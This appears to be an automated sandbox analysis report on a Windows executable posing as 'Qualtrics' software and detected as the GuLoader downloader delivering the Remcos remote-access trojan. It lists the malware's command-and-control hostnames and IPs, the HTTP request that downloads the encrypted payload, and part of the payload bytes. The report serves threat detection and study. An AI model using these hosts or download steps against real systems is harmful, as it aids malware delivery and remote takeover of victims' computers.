                Static PE Info

                General

                Entrypoint:0x401460
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                DLL Characteristics:
                Time Stamp:0x52BD6D88 [Fri Dec 27 12:07:36 2013 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:831c9926df4754b736e1ca092f4fb7e7

                Entrypoint Preview

                Instruction
                push 00401608h
                call 00007FD1589ADC33h
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                xor byte ptr [eax], al
                add byte ptr [eax], al
                inc eax
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [7341F08Eh+esi], dh
                iretd
                inc edx
                adc byte ptr [edx-57h], FFFFFFF3h
                cmpsd
                mov dl, 57h
                mov eax, dword ptr [00000000h]
                add byte ptr [eax], al
                add dword ptr [eax], eax
                add byte ptr [eax], al
                add byte ptr [eax], al
                pushad
                insd
                and al, byte ptr [ebx]
                insd
                jne 00007FD1589ADCB4h
                jc 00007FD1589ADCB3h
                jne 00007FD1589ADCB5h
                add byte ptr [ecx+00h], al
                and byte ptr [eax], cl
                inc ecx
                add byte ptr [eax], al
                add byte ptr [eax], al
                add bh, bh
                int3
                xor dword ptr [eax], eax
                add esp, dword ptr [ecx+edi*8+56852A7Dh]
                out dx, eax
                dec esp
                mov al, byte ptr [ebx]
                bound eax, dword ptr [ebp]
                and dword ptr [eax+63409490h], edi
                lea ebx, dword ptr [ebp+39h]
                int AEh
                inc edx
                mov bh, 4Fh
                pushfd
                sbb al, A7h
                insd
                push ecx
                call 00007FD18C482B7Fh
                cdq
                iretw
                adc dword ptr [edi+00AA000Ch], esi
                pushad
                rcl dword ptr [ebx+00000000h], cl
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                cmpsb
                add byte ptr [eax], al
                add byte ptr [edi+00h], al
                add byte ptr [eax], al
                add byte ptr [ebx], cl
                add byte ptr [eax+72h], dl
                outsd
                jnc 0000DCB7h
                imul ebp, dword ptr [edi+6Eh], 010D0037h
                pop es
                add byte ptr [eax+65h], cl
                popad

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x2a2040x28.text
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000xc02.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                IMAGE_DIRECTORY_ENTRY_IAT0x10000x198.text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x298540x2a000False0.509759812128data6.93605268847IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .data0x2b0000x11e80x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .rsrc0x2d0000xc020x1000False0.254638671875data3.22755332063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountry
                CUSTOM0x2d9a80x25aASCII text, with CRLF line terminatorsEnglishUnited States
                RT_ICON0x2d8780x130data
                RT_ICON0x2d5900x2e8data
                RT_ICON0x2d4680x128GLS_BINARY_LSB_FIRST
                RT_GROUP_ICON0x2d4380x30data
                RT_VERSION0x2d1a00x298dataEnglishUnited States

                Imports

                DLLImport
                MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaCyStr, __vbaVarTstLt, _CIsin, __vbaErase, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaR4Str, __vbaI2I4, __vbaObjVar, DllFunctionCall, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaFpCmpCy, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, __vbaVar2Vec, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                Version Infos

                DescriptionData
                Translation0x0409 0x04b0
                InternalNameProfylaktiskes
                FileVersion1.04
                CompanyNameQualtrics
                CommentsQualtrics
                ProductNameQualtrics
                ProductVersion1.04
                FileDescriptionQualtrics
                OriginalFilenameProfylaktiskes.exe

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                09/27/21-14:57:21.980451UDP254DNS SPOOF query response with TTL of 1 min. and no authority53495578.8.8.8192.168.2.5
                09/27/21-14:57:23.162775UDP254DNS SPOOF query response with TTL of 1 min. and no authority53617338.8.8.8192.168.2.5
                09/27/21-14:57:23.278830TCP2032776ET TROJAN Remocs 3.x Unencrypted Checkin497532404192.168.2.523.146.242.71
                09/27/21-14:57:23.563331TCP2032777ET TROJAN Remocs 3.x Unencrypted Server Response24044975323.146.242.71192.168.2.5

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Sep 27, 2021 14:57:22.035547018 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.147857904 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.148011923 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.149102926 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.262342930 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.262448072 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.262506962 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.262557030 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.262597084 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.262604952 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.262681007 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.376322985 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.376432896 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.376482964 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.376502037 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.376530886 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.376543999 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.376545906 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.376599073 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.376615047 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.376648903 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.376666069 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.376697063 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.376745939 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.376753092 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.376779079 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.376785040 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.376842976 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.489320040 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.489356041 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.489379883 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.489418983 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.489445925 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.489567041 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.489589930 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.489614964 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.489635944 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.489648104 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.489654064 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.489670992 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.489700079 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.489721060 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.489734888 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.489734888 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.489835024 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.491549969 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.491578102 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.491594076 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.491614103 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.491626978 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.491794109 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.602108955 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.602171898 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.602189064 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.602288008 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.602313995 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.602380991 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.602407932 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.602417946 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.602422953 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.602515936 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.602535009 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.602546930 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.602560997 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.602572918 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.602621078 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.602705956 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.602726936 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.602746010 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.602761984 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.602801085 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.602880001 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.602957010 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.602976084 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.602992058 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.603053093 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.603125095 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.603166103 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.603210926 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.603235006 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.603256941 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.603265047 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.603275061 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.603297949 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.603313923 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.603341103 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.603425026 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.604068041 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.604100943 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.604123116 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.604156971 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.604171038 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.604235888 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.604310989 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.604329109 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.604352951 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.604371071 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.604384899 CEST804975223.146.242.85192.168.2.5
                Sep 27, 2021 14:57:22.604399920 CEST4975280192.168.2.523.146.242.85
                Sep 27, 2021 14:57:22.604463100 CEST4975280192.168.2.523.146.242.85

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Sep 27, 2021 14:53:28.619101048 CEST6206053192.168.2.58.8.8.8
                Sep 27, 2021 14:53:28.638602972 CEST53620608.8.8.8192.168.2.5
                Sep 27, 2021 14:53:45.436956882 CEST6180553192.168.2.58.8.8.8
                Sep 27, 2021 14:53:45.457828999 CEST53618058.8.8.8192.168.2.5
                Sep 27, 2021 14:53:59.604959011 CEST5479553192.168.2.58.8.8.8
                Sep 27, 2021 14:53:59.617611885 CEST53547958.8.8.8192.168.2.5
                Sep 27, 2021 14:57:21.865385056 CEST4955753192.168.2.58.8.8.8
                Sep 27, 2021 14:57:21.980451107 CEST53495578.8.8.8192.168.2.5
                Sep 27, 2021 14:57:23.049576998 CEST6173353192.168.2.58.8.8.8
                Sep 27, 2021 14:57:23.162775040 CEST53617338.8.8.8192.168.2.5

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Sep 27, 2021 14:57:21.865385056 CEST192.168.2.58.8.8.80xa34dStandard query (0)sopage.duckdns.orgA (IP address)IN (0x0001)
                Sep 27, 2021 14:57:23.049576998 CEST192.168.2.58.8.8.80x6577Standard query (0)solex-wave.duckdns.orgA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Sep 27, 2021 14:57:21.980451107 CEST8.8.8.8192.168.2.50xa34dNo error (0)sopage.duckdns.org23.146.242.85A (IP address)IN (0x0001)
                Sep 27, 2021 14:57:23.162775040 CEST8.8.8.8192.168.2.50x6577No error (0)solex-wave.duckdns.org23.146.242.71A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • sopage.duckdns.org

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.54975223.146.242.8580C:\Users\user\Desktop\8TEZmAEx3U.exe
                TimestampkBytes transferredDirectionData
                Sep 27, 2021 14:57:22.149102926 CEST1112OUTGET /Remcos_s_bChlcwVW46.bin HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                Host: sopage.duckdns.org
                Cache-Control: no-cache
                Sep 27, 2021 14:57:22.262342930 CEST1113INHTTP/1.1 200 OK
                Content-Type: application/octet-stream
                Last-Modified: Sun, 26 Sep 2021 08:50:35 GMT
                Accept-Ranges: bytes
                ETag: "694a3892b3b2d71:0"
                Server: Microsoft-IIS/8.5
                Date: Mon, 27 Sep 2021 12:57:22 GMT
                Content-Length: 469056
                Data Raw: e7 da 56 c8 54 c9 89 52 51 a6 5c 88 94 c5 ea f4 9c 2e 9a 90 3d e6 03 a9 bf b7 5d b0 c5 1a 2a 8b 40 14 e9 68 e5 98 9f 59 f8 c2 5e 89 9f e7 c3 3a 26 8c e3 f4 bb 03 ff 27 ec 82 4a c5 d1 21 ce fa a5 74 ce 44 bd 76 77 6d 5c 9e bc 42 e6 c0 d4 38 c5 bf 78 4b 0c a3 39 1d 14 84 20 a3 8f 73 f7 a1 ac a5 93 1f ad c1 6f 93 15 af a4 17 d5 19 eb 90 6c 7e 36 0e 32 0c 12 c9 cb 0a 03 eb 4e 18 f4 0d 1b ec 5c 48 67 e3 2b e7 cf af 67 1a 0b 1b e3 c6 c4 8f f3 3d f1 f4 b6 4e 4e 26 15 2d 8a f7 b9 b9 22 24 55 31 3b 56 8d 9c b9 41 55 2c b0 b9 98 37 d2 f1 cc 9b 87 07 02 38 eb 68 b6 0c 1a 1b 12 45 4d 36 c9 6e 49 7f 94 0c c8 bb 69 e2 f9 28 09 e9 9c 36 c3 b0 e6 2b df 74 04 7a 67 0a 09 55 b9 bd 02 38 17 8a 3b d6 37 de d7 c6 3d 43 ae 3d 95 8e 32 26 23 a9 16 3f ab 93 70 78 dd 15 5b c3 97 e2 3b 34 a0 03 b8 1a be 74 de fd cb 4c f0 6a d4 ba 03 bb 35 43 51 fa 6c 20 18 c3 13 6f 52 3f db d7 7b 4c 69 98 c1 82 83 13 22 29 10 86 90 ad b4 9d 0a 52 d3 bb 1b 45 df a5 fd 29 ad 5e 6c fe fa 38 48 c1 ab 3f 4e 27 d5 f6 a7 ba 87 2d 73 2e d3 be ae 8a 2e 33 db af 9e 83 38 47 a3 a1 0a 53 09 3c cc d1 c0 e9 e6 d3 1e f5 c3 40 9c cf ac 32 a6 ef 00 17 75 0b 00 39 32 78 ed b5 32 17 fc 70 2c 89 ba 1c c8 25 36 cb f9 9f 83 bd 20 53 75 10 cd a3 d9 b2 ab 92 29 ce 65 31 2d 62 d5 4b 53 4a 4b 29 4c 98 4f 25 0a c9 a3 89 c1 b2 e3 e8 74 92 9b 51 f9 02 fc 94 4d dc dc 0f 5e 74 52 c9 4b 18 7d 48 e7 df 86 df e8 cc 66 2a 75 f2 a8 3f 10 88 2e 23 64 bd 12 d6 a2 c3 de 80 35 7b 79 89 27 b1 1f 50 38 09 2a 89 4f 81 8b 6e a4 37 62 1a 9d 13 49 f3 df c3 35 42 96 24 9b 7f c7 42 3d f8 6a f1 cd c0 91 c5 94 1d a4 09 af 34 c3 94 51 a7 48 14 59 33 54 30 60 33 78 55 f3 2c 0a ff 4a 23 d9 92 90 2e e5 d3 d5 87 6f ee cc ae 52 b4 b6 9c a3 9e a3 62 75 42 62 2d e1 48 84 fc 62 c8 87 b4 22 d1 e0 ca d0 03 2c aa 97 fb d8 71 8e 24 98 36 ac 1c 93 c3 2d 74 2c 50 74 5b cc 6d ab c9 9d b7 46 91 0d 24 94 76 6b 94 77 19 92 82 c8 b0 cf c8 a2 50 68 7f d8 77 d4 7c e4 28 f2 1e 98 2d 7b b3 a1 41 de 1d fe 59 91 3c e0 ce de 77 bd fc de ab f2 17 43 18 4b 50 31 e8 65 14 2f 6a 50 ed 4d a9 bf c1 7e a2 76 21 68 b2 c9 34 a0 e7 dd f5 7a e9 64 33 7d c9 34 26 f8 e3 f7 b0 ad b0 af 35 6d 18 30 24 59 4b cf d0 ec de 80 d3 b2 2d 36 49 53 dc 1b a7 e2 0c d3 5d 05 80 c5 04 cc 56 8a a2 62 10 f3 dd 7c 14 6e 7a 9b 22 2e ab 94 6e 2f fd bd a4 1e 69 bc 6f 75 8a c3 30 13 1f cf 8e a7 c4 b6 6e a6 e6 94 b4 bf fd 8e d2 36 c9 a3 74 e5 00 19 22 00 9a e3 f5 2b 43 31 b6 76 5b cb cf b8 06 bc 92 d2 a0 2f 13 a7 60 9c a2 6a a9 fb f9 44 57 1d b3 05 99 5e ad 39 7c b1 36 e9 e3 fb 77 a3 09 4f e7 42 2a 2e 42 a0 e5 80 4e c9 83 88 18 2e da 4f c4 70 51 2e 50 25 77 cf b3 30 fc d4 5d d5 93 1b 1c 36 bb 05 b0 89 6c 53 a6 63 76 82 49 c0 00 02 5e 88 5c 5a bc f8 d9 ee f1 a2 2a a1 60 b3 18 70 fc e1 72 dc d2 53 6e db f9 f4 56 a7 14 88 24 a9 ab f0 0f a9 6c 39 e0 eb 86 5e 8c 5f 4c 00 f8 ee 69 7f 64 c1 13 a4 db 3b 19 a0 94 c7 ba 72 01 fb 1b 5d 79 46 e8 2e 5e 44 be 76 77 6d 58 9e bc 42 19 3f d4 38 7d bf 78 4b 0c a3 39 1d 54 84 20 a3 8f 73 f7 a1 ac a5 93 1f ad c1 6f 93 15 af a4 17 d5 19 eb 90 6c 7e 36 0e 32 0c 12 c9 cb 0a 03 eb 5e 19 f4 0d 15 f3 e6 46 67 57 22 2a ee 17 66 56 c6 3a b7 ae ad fc d3 4d 83 9b d1 3c 2f 4b 35 4e eb 99 d7 d6 56 04 37 54 1b 24 f8 f2 99 28 3b 0c f4 f6 cb 17 bf 9e a8 fe a9 0a 0f 32 cf 68 b6 0c 1a 1b 12 45 e7 b5 8b 5e a7 9d b8 6f 26 59 45 81 17 ca 25 8a c6 f1 fe 13 5c c9 1b 74 51
                Data Ascii: VTRQ\.=]*@hY^:&'J!tDvwm\B8xK9 sol~62N\Hg+g=NN&-"$U1;VAU,78hEM6nIi(6+tzgU8;7=C=2&#?px[;4tLj5CQl oR?{Li")RE)^l8H?N'-s..38GS<@2u92x2p,%6 Su)e1-bKSJK)LO%tQM^tRK}Hf*u?.#d5{y'P8*On7bI5B$B=j4QHY3T0`3xU,J#.oRbuBb-Hb",q$6-t,Pt[mF$vkwPhw|(-{AY<wCKP1e/jPM~v!h4zd3}4&5m0$YK-6IS]Vb|nz".n/iou0n6t"+C1v[/`jDW^9|6wOB*.BN.OpQ.P%w0]6lScvI^\Z*`prSnV$l9^_Lid;r]yF.^DvwmXB?8}xK9T sol~62^FgW"*fV:M</K5NV7T$(;2hE^o&YE%\tQ


                Code Manipulations

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:14:53:32
                Start date:27/09/2021
                Path:C:\Users\user\Desktop\8TEZmAEx3U.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\Desktop\8TEZmAEx3U.exe'
                Imagebase:0x400000
                File size:184320 bytes
                MD5 hash:28C8B2207BB3E6884E1E29575FB19BEC
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Visual Basic
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.486721173.0000000002230000.00000040.00000001.sdmp, Author: Joe Security
                Reputation:low

                General

                Start time:14:55:27
                Start date:27/09/2021
                Path:C:\Users\user\Desktop\8TEZmAEx3U.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\Desktop\8TEZmAEx3U.exe'
                Imagebase:0x400000
                File size:184320 bytes
                MD5 hash:28C8B2207BB3E6884E1E29575FB19BEC
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.761066423.0000000000707000.00000004.00000020.sdmp, Author: Joe Security
                Reputation:low

                Disassembly

                Code Analysis

                Reset < >